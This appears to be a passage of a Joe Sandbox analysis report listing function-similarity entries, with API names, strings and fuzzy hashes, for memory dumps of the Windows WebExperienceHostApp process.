                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: OpenSemaphore$ErrorLast
                                                                    • String ID: _p0
                                                                    • API String ID: 3042991519-2437413317
                                                                    • Opcode ID: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
                                                                    • Instruction ID: 8ac9b262c451f482cc2e6d944dffa3d102b35a86e1a90638ff43ec567135ce93
                                                                    • Opcode Fuzzy Hash: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
                                                                    • Instruction Fuzzy Hash: 85719522B59A8291EA54DB25D4541FEA3A0FF8C740F608631DA4FC76E4FFBDD9058710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemcpy
                                                                    • String ID: %.0Lf$0123456789-
                                                                    • API String ID: 931391446-3094241602
                                                                    • Opcode ID: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
                                                                    • Instruction ID: c9890b3f9609f3c2adbddcf8e2c5de838dcde5e8dc8b9510b26a84e3b285cc94
                                                                    • Opcode Fuzzy Hash: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
                                                                    • Instruction Fuzzy Hash: AE716062B19B5695EB00CFA5D4542AC3771EB89B88F444036DF4E17BAEDE3CD88AC340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturnmemchrmemcpy
                                                                    • String ID: 0123456789-
                                                                    • API String ID: 4232306570-3850129594
                                                                    • Opcode ID: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
                                                                    • Instruction ID: bee18435a732d0bcda95b986d6ce0381e27e9014b5e19a89e5f341401ac2b1b5
                                                                    • Opcode Fuzzy Hash: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
                                                                    • Instruction Fuzzy Hash: 71717022B0DB9699FB01CBA5D4502AC7BB5EB95B98F440436DF8D17BAECE38D545C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_invalid_parameter_noinfo_noreturnswprintf_s
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 1248405305-1402515088
                                                                    • Opcode ID: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
                                                                    • Instruction ID: ce083e2d97322f61f15cab78b29cfefdb75b787904f091dc01f3046e8cd7682a
                                                                    • Opcode Fuzzy Hash: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
                                                                    • Instruction Fuzzy Hash: 36619222B08B8689EB01CB75E4402AD7B65EB99798F544136EF8D27B6EDF3CD446C340
                                                                    APIs
                                                                      • Part of subcall function 00007FFE13306770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE133023AE), ref: 00007FFE1330677E
                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE133041E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abort
                                                                    • String ID: $csm$csm
                                                                    • API String ID: 4206212132-1512788406
                                                                    • Opcode ID: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
                                                                    • Instruction ID: c70c6823a6fe9b9b5b2162db8dea49fee1caf7be0210944b649548e5037deddb
                                                                    • Opcode Fuzzy Hash: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
                                                                    • Instruction Fuzzy Hash: 7871D536A08A818AD7248F27D5407BDB7A1FB24BA4F148175DA6C37AA9CF3CD650CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind
                                                                    • String ID: csm$f
                                                                    • API String ID: 451473138-629598281
                                                                    • Opcode ID: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
                                                                    • Instruction ID: 2683c1c2804be3b15e21e186407d43749ecd3db8f216d557a47ec67b0989fa65
                                                                    • Opcode Fuzzy Hash: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
                                                                    • Instruction Fuzzy Hash: B251D632B0EE428EEB14CB17E444A2D3795FB64BA4F5485B0E92E63758DF78E841C718
                                                                    APIs
                                                                      • Part of subcall function 00007FFE13306770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE133023AE), ref: 00007FFE1330677E
                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303F37
                                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13303F47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                    • String ID: csm$csm
                                                                    • API String ID: 4108983575-3733052814
                                                                    • Opcode ID: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
                                                                    • Instruction ID: 96bcf07c30e3f331d47710d5c8089a9c8bf6f3a68d38c50940af14817083833f
                                                                    • Opcode Fuzzy Hash: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
                                                                    • Instruction Fuzzy Hash: E2519272908A828EEB748B13914436D77A0FB64BB4F144275DAAC67BE5CF3CE551CB08
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$RaiseThrowabort
                                                                    • String ID: csm
                                                                    • API String ID: 3758033050-1018135373
                                                                    • Opcode ID: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
                                                                    • Instruction ID: 9fa6c372976084d037e5a841dc38c38375d7c073a16ee24313a5da8512459ce5
                                                                    • Opcode Fuzzy Hash: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
                                                                    • Instruction Fuzzy Hash: ED515F36905B8AC6DB15CF28C4502A837A0FB98B58F159326DB5D077AAEF39E6D5C300
                                                                    APIs
                                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF60BD76B1F
                                                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF60BD76B6B
                                                                      • Part of subcall function 00007FF60BD78A00: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF60BD78A3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCurrentErrorLastMutexProcess
                                                                    • String ID: Local\SM0:%lu:%lu:%hs$x
                                                                    • API String ID: 3298007088-452036900
                                                                    • Opcode ID: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
                                                                    • Instruction ID: f7e30209d33e5e4c4db7976c684b4df2f7cae193e1d51ddca5ed4bddc27f6acc
                                                                    • Opcode Fuzzy Hash: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
                                                                    • Instruction Fuzzy Hash: F341533165CA8181EB549B25E4941EEA760EB9C780F609231FA4FC7AF5FEBCD945C700
                                                                    APIs
                                                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE0028F984
                                                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE0028F996
                                                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE0028FA1B
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: setlocale$freemallocmemcpy
                                                                    • String ID: bad locale name
                                                                    • API String ID: 1663771476-1405518554
                                                                    • Opcode ID: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
                                                                    • Instruction ID: cd5561019410931204d832230733c8699b93d95fbcf294dfd2103a5e87024ca7
                                                                    • Opcode Fuzzy Hash: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
                                                                    • Instruction Fuzzy Hash: E131B826F0DA4351FB95DB59A5402796B91AFC4BC0F588036DB8D477BFDE2CE8818300
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE0029A86C), ref: 00007FFE002A43F1
                                                                      • Part of subcall function 00007FFE0028B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B63B
                                                                      • Part of subcall function 00007FFE0028B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B657
                                                                      • Part of subcall function 00007FFE00296EBC: _Maklocstr.LIBCPMT ref: 00007FFE00296EEC
                                                                      • Part of subcall function 00007FFE00296EBC: _Maklocstr.LIBCPMT ref: 00007FFE00296F0B
                                                                      • Part of subcall function 00007FFE00296EBC: _Maklocstr.LIBCPMT ref: 00007FFE00296F2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
                                                                    • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                    • API String ID: 2904694926-3573081731
                                                                    • Opcode ID: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
                                                                    • Instruction ID: ea88ca5552425ad4635dede7a76801210203163ccf1932ef878217c68dc21b60
                                                                    • Opcode Fuzzy Hash: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
                                                                    • Instruction Fuzzy Hash: 2A41C232A08B929BE725DF21958056D7BA0FBC97817144235DB8D43F2ADFB8F561C700
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,?,00000001,00007FFE002B2CE8), ref: 00007FFE002B4E75
                                                                      • Part of subcall function 00007FFE0028B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B63B
                                                                      • Part of subcall function 00007FFE0028B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002B1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE002B2EAE), ref: 00007FFE0028B657
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
                                                                    • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                    • API String ID: 3376215315-3573081731
                                                                    • Opcode ID: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
                                                                    • Instruction ID: 2bdb8e5e4cf3763826ddfbb003f05e28c70c13ba1a259ff93413f561a39334be
                                                                    • Opcode Fuzzy Hash: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
                                                                    • Instruction Fuzzy Hash: 3441BE32A08B828BE725DF21A19057D7BA4FB84781B044235DB8D83F2BDB38E5A1C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: NameName::
                                                                    • String ID: %lf
                                                                    • API String ID: 1333004437-2891890143
                                                                    • Opcode ID: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
                                                                    • Instruction ID: b6677fd6ee09b4f3e726e77892c99f6e62b5f813c4539b0fa4135a6276558f99
                                                                    • Opcode Fuzzy Hash: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
                                                                    • Instruction Fuzzy Hash: F031D67290CE8189EA20CB26F45027D7760FB697A0F5442B5E9EE57275CF3CD402C704
                                                                    APIs
                                                                      • Part of subcall function 00007FFE0028671C: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE002867CF
                                                                    • __std_exception_copy.VCRUNTIME140_APP ref: 00007FFE0028443B
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0028447C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                    • String ID: V($pV(
                                                                    • API String ID: 1944019136-3678563292
                                                                    • Opcode ID: a893699d33faabf76b3b2f70d19aca2e2e10cc9c0b266e1a7bdf617b24cf58dd
                                                                    • Instruction ID: 35655581d1a68227b720f2c33223d86077e86b88ccf5eaba298d9e04246751e4
                                                                    • Opcode Fuzzy Hash: a893699d33faabf76b3b2f70d19aca2e2e10cc9c0b266e1a7bdf617b24cf58dd
                                                                    • Instruction Fuzzy Hash: 5A314D62E05B5788FB01DBA4D8443AC27B5BB98758F404232DF9C567AEEF38A594C340
                                                                    APIs
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,?,?,00007FF60BD731E9,?,?,?,?,?,?,?,?), ref: 00007FF60BD7514F
                                                                    • GetErrorInfo.OLEAUT32(?,?,?,?,00000000,?), ref: 00007FF60BD75182
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorInfoProc
                                                                    • String ID: RoOriginateLanguageException$combase.dll
                                                                    • API String ID: 4049917127-3996158991
                                                                    • Opcode ID: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
                                                                    • Instruction ID: 71aeed1ca60cf9f0e9dd69be7c8bdd330d935f7fef5b1464a14936145f1291e1
                                                                    • Opcode Fuzzy Hash: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
                                                                    • Instruction Fuzzy Hash: 12312B22B55A1695FB089B64E8513FCA370FB58788FA08635DE0ED66E5EFBCE544C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: WilFailureNotifyWatchers$kernelbase.dll
                                                                    • API String ID: 1646373207-2571501353
                                                                    • Opcode ID: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
                                                                    • Instruction ID: ca6bfd33298bc8cdb01ef0eeefb23331e78d018e96c4bd3ef8262ecb7dc63a42
                                                                    • Opcode Fuzzy Hash: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
                                                                    • Instruction Fuzzy Hash: 4131703695978186EB588F28E4540B9B7A0FB4C744F248639EA8EC67B4FFBCD544CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
